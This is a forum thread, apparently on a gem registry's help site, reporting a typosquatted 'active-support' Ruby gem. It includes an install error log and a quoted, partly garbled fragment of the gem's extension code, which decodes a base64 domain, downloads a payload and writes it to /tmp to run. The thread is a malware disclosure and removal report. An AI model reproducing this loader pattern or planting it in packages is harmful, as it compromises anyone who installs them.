This help site has been deprecated. Please send your requests to

Reporting Abuse on active-support

Guilherme Ramos's Avatar

Guilherme Ramos

09 Aug, 2018 02:10 AM

This seems like a bogus gem.
Use a very similar name as a very popular gem.
Description seems off

Installation gives

This seems like a bogus gem.
Use a very similar name as a very popular gem.
Description seems off

Installation gives

Fetching gem metadata from
Resolving dependencies...
Fetching active-support 5.2.0
Installing active-support 5.2.0 with native extensions
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

current directory:
/redacted/.rvm/rubies/ruby-2.4.4/bin/ruby -r ./siteconf20180809-44989-1mvw31o.rb extconf.rb
extconf.rb:27:in `run': undefined method `install_exploit' for Smectis:Class (NoMethodError)
Did you mean? install_explot
from extconf.rb:31:in `<main>'

extconf failed, exit code 1

Gem files will remain installed in /redacted/.rvm/gems/ruby-2.4.4/gems/active-support-5.2.0 for
Results logged to

An error occurred while installing active-support (5.2.0), and Bundler cannot continue.
Make sure that `gem install active-support -v '5.2.0' --source ''` succeeds
before bundling.

In Gemfile:

  1. 1 Posted by Sam Giffney on 09 Aug, 2018 02:15 AM

    Sam Giffney's Avatar

    Further investigation shows definite malware behaviour.

    The gem duplicate official activesupport (no hyphen) code but adds a compiled extension.

    attempts to resolve a base64 encoded domain, download a payload and execute.

    require 'net/http'
    require 'uri'
    require 'base64'
    require 'resolv'

    class Smectis
      def self.install_explot(weighership)
        if !weighership.nil? and weighership != ''
          educable = Net::HTTP.get_response(URI('http://' + weighership + '/mimming'))
'/tmp/autosymbiontic', 'wb+') do |uterometer|

        milligram = 'MjlmYWVhNjMucGxhbmZobnRhZ2UuZGU='
        jaunting = nil
          jaunting = Resolv.getaddress(Base64.decode64(milligram))

  2. 2 Posted by Patrick Figel on 09 Aug, 2018 12:15 PM

    Patrick Figel's Avatar

    Probably the same thing with this gem from the same user:

  3. Support Staff 3 Posted by David Radcliffe on 09 Aug, 2018 01:10 PM

    David Radcliffe's Avatar

    Thanks for the report. We have removed the gem.

  4. David Radcliffe closed this discussion on 09 Aug, 2018 01:10 PM.

Discussions are closed to public comments.
If you need help with please start a new discussion.

Keyboard shortcuts


? Show this help
ESC Blurs the current field

Comment Form

r Focus the comment reply box
^ + ↩ Submit the comment

You can use Command ⌘ instead of Control ^ on Mac

Recent Discussions

20 Oct, 2020 07:13 PM
20 Oct, 2020 11:11 AM
13 Oct, 2020 06:14 PM
13 Oct, 2020 04:27 AM
06 Oct, 2020 08:22 AM